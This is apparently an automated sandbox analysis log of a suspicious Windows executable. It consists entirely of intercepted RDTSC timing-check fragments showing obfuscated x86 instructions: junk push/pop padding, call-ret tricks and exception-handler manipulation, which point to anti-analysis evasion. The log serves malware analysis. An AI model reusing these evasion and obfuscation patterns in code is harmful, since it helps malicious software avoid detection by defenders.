Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2A40 second address: AC2A45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2A45 second address: AC2A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2A4B second address: AC2A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2A51 second address: AC2A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2D3D second address: AC2D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2D43 second address: AC2D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2EA5 second address: AC2EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2FF3 second address: AC2FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC2FF9 second address: AC3011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0738AFBE5Eh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC3011 second address: AC3016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC315C second address: AC319B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F0738AFBE5Dh 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f jbe 00007F0738AFBE56h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jne 00007F0738AFBE56h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0738AFBE61h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A92E28 second address: A92E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 pushad 0x00000008 jns 00007F0738B194D6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC4001 second address: AC4033 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0738AFBE56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0738AFBE64h 0x00000012 jmp 00007F0738AFBE5Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC4033 second address: AC4038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC6DDB second address: AC6DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC6DE0 second address: AC6DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0738B194D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC6DEA second address: AC6DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC6DEE second address: AC6E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jp 00007F0738B194E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0738B194E2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC6E22 second address: AC6E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC72B0 second address: AC72D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0738B194D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0738B194E9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC72D5 second address: AC72F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC5C0D second address: AC5C22 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0738B194D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F0738B194D8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC5C22 second address: AC5C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0738AFBE56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC6383 second address: AC638E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC7676 second address: AC769C instructions: 0x00000000 rdtsc 0x00000002 je 00007F0738AFBE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F0738AFBE62h 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC769C second address: AC76B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AC76B0 second address: AC76BA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0738AFBE5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: A96408 second address: A9642B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DEh 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0738B194DBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACECE2 second address: ACECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACECE8 second address: ACECED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACECED second address: ACED14 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0738AFBE65h 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F0738AFBE58h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE331 second address: ACE34A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0738B194D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0738B194DAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE34A second address: ACE352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE4A5 second address: ACE4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE94F second address: ACE955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE955 second address: ACE959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE959 second address: ACE986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0738AFBE62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0738AFBE63h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE986 second address: ACE98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE98A second address: ACE994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE994 second address: ACE99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0738B194D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACE99E second address: ACE9A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACEB60 second address: ACEB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACEB64 second address: ACEB70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACEB70 second address: ACEB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ACEB74 second address: ACEB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD1F39 second address: AD1F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD2001 second address: AD2006 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD2006 second address: AD203C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F0738B194E6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jng 00007F0738B194D8h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD203C second address: AD2045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD2045 second address: AD2049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD2049 second address: AD20C2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0738AFBE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F0738AFBE63h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ecx 0x00000017 jnp 00007F0738AFBE6Ah 0x0000001d pop ecx 0x0000001e pop eax 0x0000001f sub esi, 384566D2h 0x00000025 call 00007F0738AFBE59h 0x0000002a jmp 00007F0738AFBE66h 0x0000002f push eax 0x00000030 jc 00007F0738AFBE5Ah 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a pushad 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD20C2 second address: AD20CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD20CC second address: AD20DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD20DA second address: AD20E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD246B second address: AD2470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD2470 second address: AD247F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD247F second address: AD2483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD2483 second address: AD2487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD2638 second address: AD2642 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0738AFBE5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD30E4 second address: AD30E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD30E8 second address: AD30EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD335D second address: AD3363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD3363 second address: AD3384 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007F0738AFBE56h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push ecx 0x00000010 jmp 00007F0738AFBE5Ah 0x00000015 pop edi 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD3384 second address: AD338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0738B194D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD338F second address: AD3395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD4337 second address: AD433B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD416E second address: AD418D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD418D second address: AD4192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD531C second address: AD5326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD5326 second address: AD532A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD532A second address: AD5388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+1244BF8Fh], esi 0x0000000e sub si, 1085h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F0738AFBE58h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr [ebp+1244D3E9h], ecx 0x00000035 jmp 00007F0738AFBE66h 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+1244D405h], ebx 0x00000042 xchg eax, ebx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD5388 second address: AD538C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD5C59 second address: AD5C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD6A08 second address: AD6A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADA20F second address: ADA215 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADE95C second address: ADE9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push edi 0x0000000a sub edi, dword ptr [ebp+122DB47Bh] 0x00000010 pop edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F0738B194D8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d and edi, dword ptr [ebp+122D384Dh] 0x00000033 push 00000000h 0x00000035 mov edi, eax 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jne 00007F0738B194D6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADE9A8 second address: ADE9B2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0738AFBE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADEAE4 second address: ADEAF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADEAF7 second address: ADEB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0738AFBE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: ADEB01 second address: ADEB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE0995 second address: AE0A0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D3A75h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F0738AFBE58h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 movsx ebx, dx 0x0000003a mov eax, dword ptr [ebp+122D1355h] 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007F0738AFBE58h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a movsx ebx, di 0x0000005d push FFFFFFFFh 0x0000005f push eax 0x00000060 clc 0x00000061 pop ebx 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 push edx 0x00000066 push edi 0x00000067 pop edi 0x00000068 pop edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE0A0A second address: AE0A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE1A18 second address: AE1A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007F0738AFBE5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE1A25 second address: AE1AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F0738B194E6h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0738B194D8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d movzx ebx, cx 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F0738B194D8h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 mov edi, 691D45B0h 0x00000056 mov eax, dword ptr [ebp+122D02F5h] 0x0000005c push FFFFFFFFh 0x0000005e sub dword ptr [ebp+122D2D04h], edi 0x00000064 nop 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F0738B194DFh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AE1AC2 second address: AE1AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0738AFBE62h 0x00000010 rdtsc
